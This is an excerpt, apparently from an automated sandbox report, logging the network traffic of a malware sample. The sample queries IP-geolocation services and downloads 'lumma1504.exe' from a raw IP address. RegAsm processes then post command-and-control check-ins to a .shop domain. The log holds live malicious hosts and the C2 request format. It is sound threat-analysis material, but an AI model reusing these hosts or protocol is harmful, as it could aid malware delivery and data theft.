                                                                                                                                            Apr 21, 2024 15:31:35.292637110 CEST49769443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:35.292732000 CEST44349769172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:35.292854071 CEST49769443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:35.293169975 CEST49769443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:35.293204069 CEST44349769172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:35.510799885 CEST44349769172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:35.510971069 CEST49769443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:35.512057066 CEST49769443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:35.512093067 CEST44349769172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:35.512320995 CEST44349769172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:35.513591051 CEST49769443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:35.513726950 CEST49769443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:35.513766050 CEST44349769172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:36.034908056 CEST44349769172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:36.034995079 CEST44349769172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:36.035079002 CEST49769443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.035181999 CEST49769443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.035203934 CEST44349769172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:36.076035023 CEST49770443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.076141119 CEST44349770172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:36.076276064 CEST49770443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.076591969 CEST49770443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.076630116 CEST44349770172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:36.290669918 CEST44349770172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:36.290832996 CEST49770443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.292041063 CEST49770443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.292066097 CEST44349770172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:36.292294979 CEST44349770172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:36.293508053 CEST49770443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.313987970 CEST49770443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.314062119 CEST44349770172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:36.314140081 CEST49770443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.314162970 CEST44349770172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:36.885701895 CEST44349770172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:36.885776043 CEST44349770172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:36.885994911 CEST49770443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.885994911 CEST49770443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.937021971 CEST49771443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.937076092 CEST44349771172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:36.937174082 CEST49771443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.937475920 CEST49771443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:36.937494040 CEST44349771172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:37.157561064 CEST44349771172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:37.157773018 CEST49771443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:37.158900976 CEST49771443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:37.158934116 CEST44349771172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:37.159161091 CEST44349771172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:37.160177946 CEST49771443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:37.160288095 CEST49771443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:37.160326958 CEST44349771172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:37.193413973 CEST49770443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:37.193451881 CEST44349770172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:37.563560009 CEST44349771172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:37.563659906 CEST44349771172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:37.563843966 CEST49771443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:37.564038038 CEST49771443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:37.564060926 CEST44349771172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:37.579819918 CEST49772443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:37.579850912 CEST44349772172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:37.580070972 CEST49772443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:37.580199003 CEST49772443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:37.580212116 CEST44349772172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:37.797600031 CEST44349772172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:37.797724962 CEST49772443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:37.798990965 CEST49772443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:37.798995972 CEST44349772172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:37.799209118 CEST44349772172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:37.800487041 CEST49772443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:37.800580025 CEST49772443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:37.800585032 CEST44349772172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.177263021 CEST44349772172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.177366972 CEST44349772172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.177508116 CEST49772443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.177649975 CEST49772443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.177659988 CEST44349772172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.596580029 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.596671104 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.596787930 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.597069979 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.597101927 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.815046072 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.815198898 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.816385031 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.816406012 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.816626072 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.819737911 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.820625067 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.820688963 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.824641943 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.824686050 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.828710079 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.828762054 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.832726002 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.832786083 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.835990906 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.836050987 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.836756945 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.836791992 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.836817026 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.836843967 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.837116957 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.837160110 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.837198019 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.837275982 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.837326050 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.880136013 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.880338907 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.880377054 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.880410910 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.880444050 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:38.880513906 CEST49773443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:38.880547047 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:40.468918085 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:40.469043016 CEST44349773172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:47.062655926 CEST44349781172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:47.062835932 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.062884092 CEST44349781172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:47.063066959 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.063106060 CEST44349781172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:47.063131094 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.063155890 CEST44349781172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:47.063270092 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.063304901 CEST44349781172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:47.063339949 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.063427925 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.063468933 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.108118057 CEST44349781172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:47.108494997 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.108572960 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.108627081 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.156136990 CEST44349781172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:47.156757116 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:47.204138041 CEST44349781172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:48.651071072 CEST44349781172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:48.651134014 CEST44349781172.67.189.66192.168.2.4
                                                                                                                                            Apr 21, 2024 15:31:48.651206017 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:48.651386023 CEST49781443192.168.2.4172.67.189.66
                                                                                                                                            Apr 21, 2024 15:31:48.651431084 CEST44349781172.67.189.66192.168.2.4
Timestamp                             Source Port  Dest Port  Source IP    Dest IP
Apr 21, 2024 15:31:11.948151112 CEST  57407        53         192.168.2.4  1.1.1.1
Apr 21, 2024 15:31:12.054332972 CEST  53           57407      1.1.1.1      192.168.2.4
Apr 21, 2024 15:31:12.604170084 CEST  65458        53         192.168.2.4  1.1.1.1
Apr 21, 2024 15:31:12.710485935 CEST  53           65458      1.1.1.1      192.168.2.4
Apr 21, 2024 15:31:20.586831093 CEST  52093        53         192.168.2.4  1.1.1.1
Apr 21, 2024 15:31:20.719496965 CEST  53           52093      1.1.1.1      192.168.2.4
Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                     Type            Class        DNS over HTTPS
Apr 21, 2024 15:31:11.948151112 CEST  192.168.2.4  1.1.1.1  0x82fa    Standard query (0)  ipinfo.io                A (IP address)  IN (0x0001)  false
Apr 21, 2024 15:31:12.604170084 CEST  192.168.2.4  1.1.1.1  0xca8d    Standard query (0)  db-ip.com                A (IP address)  IN (0x0001)  false
Apr 21, 2024 15:31:20.586831093 CEST  192.168.2.4  1.1.1.1  0x1d46    Standard query (0)  bordersoarmanusjuw.shop  A (IP address)  IN (0x0001)  false
Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name                     CName  Address         Type            Class        DNS over HTTPS
Apr 21, 2024 15:31:12.054332972 CEST  1.1.1.1    192.168.2.4  0x82fa    No error (0)  ipinfo.io                       34.117.186.192  A (IP address)  IN (0x0001)  false
Apr 21, 2024 15:31:12.710485935 CEST  1.1.1.1    192.168.2.4  0xca8d    No error (0)  db-ip.com                       104.26.5.15     A (IP address)  IN (0x0001)  false
Apr 21, 2024 15:31:12.710485935 CEST  1.1.1.1    192.168.2.4  0xca8d    No error (0)  db-ip.com                       104.26.4.15     A (IP address)  IN (0x0001)  false
Apr 21, 2024 15:31:12.710485935 CEST  1.1.1.1    192.168.2.4  0xca8d    No error (0)  db-ip.com                       172.67.75.166   A (IP address)  IN (0x0001)  false
Apr 21, 2024 15:31:20.719496965 CEST  1.1.1.1    192.168.2.4  0x1d46    No error (0)  bordersoarmanusjuw.shop         172.67.189.66   A (IP address)  IN (0x0001)  false
Apr 21, 2024 15:31:20.719496965 CEST  1.1.1.1    192.168.2.4  0x1d46    No error (0)  bordersoarmanusjuw.shop         104.21.9.123    A (IP address)  IN (0x0001)  false
                                                                                                                                            • https:
                                                                                                                                              • ipinfo.io
                                                                                                                                            • db-ip.com
                                                                                                                                            • bordersoarmanusjuw.shop
                                                                                                                                            • 193.233.132.253
Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
0           192.168.2.4  49740        193.233.132.253  80                6736  C:\Users\user\Desktop\2q45IEa3Ee.exe

Timestamp  Bytes transferred  Direction  Data
Apr 21, 2024 15:31:18.443950891 CEST  223  OUT  HEAD /lumma1504.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
Host: 193.233.132.253
Cache-Control: no-cache
Apr 21, 2024 15:31:18.696966887 CEST  155  IN  HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 315904
Date: Sun, 21 Apr 2024 13:31:18 GMT
Server: Python/3.10 aiohttp/3.8.6
Apr 21, 2024 15:31:18.698138952 CEST  222  OUT  GET /lumma1504.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
Host: 193.233.132.253
Cache-Control: no-cache
Apr 21, 2024 15:31:18.947947979 CEST  155  IN  HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 315904
Date: Sun, 21 Apr 2024 13:31:18 GMT
Server: Python/3.10 aiohttp/3.8.6


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  49733        34.117.186.192  443               6736  C:\Users\user\Desktop\2q45IEa3Ee.exe

Timestamp  Bytes transferred  Direction  Data
2024-04-21 13:31:12 UTC  237  OUT  GET /widget/demo/81.181.57.52 HTTP/1.1
Connection: Keep-Alive
Referer: https://ipinfo.io/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Host: ipinfo.io
2024-04-21 13:31:12 UTC  513  IN  HTTP/1.1 200 OK
server: nginx/1.24.0
date: Sun, 21 Apr 2024 13:31:12 GMT
content-type: application/json; charset=utf-8
Content-Length: 980
access-control-allow-origin: *
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
referrer-policy: strict-origin-when-cross-origin
x-envoy-upstream-service-time: 4
via: 1.1 google
strict-transport-security: max-age=2592000; includeSubDomains
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-04-21 13:31:12 UTC  742  IN
Data Ascii: { "input": "81.181.57.52", "data": { "ip": "81.181.57.52", "city": "Atlanta", "region": "Georgia", "country": "US", "loc": "33.7490,-84.3880", "org": "AS212238 Datacamp Limited", "postal": "30302", "timezone": "America/
2024-04-21 13:31:12 UTC  238  IN
Data Ascii: address": "Averescu Maresal 8-10, Bucharest, Romania", "country": "RO", "email": "abuse-binbox@rnc.ro", "name": "Abuse contact role object", "network": "81.181.48.0/20", "phone": "+40 378 600 000" } }}


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.4  49734        104.26.5.15     443               6736  C:\Users\user\Desktop\2q45IEa3Ee.exe

Timestamp  Bytes transferred  Direction  Data
2024-04-21 13:31:12 UTC  261  OUT  GET /demo/home.php?s=81.181.57.52 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Host: db-ip.com
2024-04-21 13:31:13 UTC  656  IN  HTTP/1.1 200 OK
Date: Sun, 21 Apr 2024 13:31:13 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: close
x-iplb-request-id: AC4546BA:D98C_93878F2E:0050_66251521_92C0CEE:4F34
x-iplb-instance: 59215
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wDJpV0sjkY%2F1TjVMocAMLJ%2F8Ut9sq3KJUiX0%2BRDGPZsMaZy0ZSRgGVrrKcQ2GPwuwNK2lwKBsV2IMw8vIDvPqAC3zOnxlpqY8%2Bwtcit7ufUZjAvuNEl96Igkiw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 877dbbaf08cf44dd-ATL
alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:13 UTC | 699 | IN | Data Raw: 32 62 34 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 69 70 41 64 64 72 65 73 73 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 69 73 45 75 4d 65 6d 62 65 72 22 3a 66 61 6c 73 65 2c 22 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 22 63 75 72 72 65 6e 63 79 4e 61 6d 65 22 3a 22 44 6f 6c 6c 61 72 22 2c 22 70 68 6f 6e 65 50 72 65 66 69 78 22 3a 22 31 22 2c 22 6c 61 6e 67 75 61 67 65 73 22 3a
                                                                                                                                            Data Ascii: 2b4{"status":"ok","demoInfo":{"ipAddress":"81.181.57.52","continentCode":"NA","continentName":"North America","countryCode":"US","countryName":"United States","isEuMember":false,"currencyCode":"USD","currencyName":"Dollar","phonePrefix":"1","languages":
                                                                                                                                            2024-04-21 13:31:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                            2 | 192.168.2.4 | 49742 | 172.67.189.66 | 443 | 1740 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                            2024-04-21 13:31:20 UTC | 270 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 8
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:21 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                            Data Ascii: act=life
                                                                                                                                            2024-04-21 13:31:21 UTC | 822 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:21 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=6j0i928ois2qt1ksnh8v0jnsft; expires=Thu, 15-Aug-2024 07:18:00 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hqNzA1f1J3l1%2FIph%2B6iFHGlH2L3KrtZV%2B9lF%2FK7fyQ0EqYJUo9HRYNpb%2FDhacB6bcHTy%2BANhvq3ZVGKQKTq4JHsS%2FwWlOcJNX6YMCaNcAk3eHZA8s1tfqIxZayr8JfW7shT5%2F3dsgdD9PQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbe12e6053d8-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:21 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                            Data Ascii: 2ok
                                                                                                                                            2024-04-21 13:31:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                            3 | 192.168.2.4 | 49743 | 172.67.189.66 | 443 | 5856 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                            2024-04-21 13:31:21 UTC | 270 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 8
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:21 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                            Data Ascii: act=life
                                                                                                                                            2024-04-21 13:31:22 UTC | 818 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:22 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=fahfug7sf4pd76eu7h0sgcbvsd; expires=Thu, 15-Aug-2024 07:18:01 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kxDe2B1skry%2BQYr%2F4aIAZpaqexJ39OIf2P5BMqtT%2B7DJdr9uc3rZ9ZIk6tKpfgj656Bl8bmnhxPlisQt%2FIgMWQJwc9TyHIOrgacZhoKeljkl%2BqP0jbFtd5vm%2BmJPdxXgHuCjJ4J3vQDSkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbe4f98d7bb1-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:22 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                            Data Ascii: 2ok
                                                                                                                                            2024-04-21 13:31:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                            4 | 192.168.2.4 | 49745 | 172.67.189.66 | 443 | 1740 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                            2024-04-21 13:31:21 UTC | 271 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 49
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:21 UTC | 49 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d 64 65 66 61 75 6c 74
                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=default
                                                                                                                                            2024-04-21 13:31:22 UTC | 812 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:22 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=uhr0ep1j0rrojkcrmphlhtnmnm; expires=Thu, 15-Aug-2024 07:18:01 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
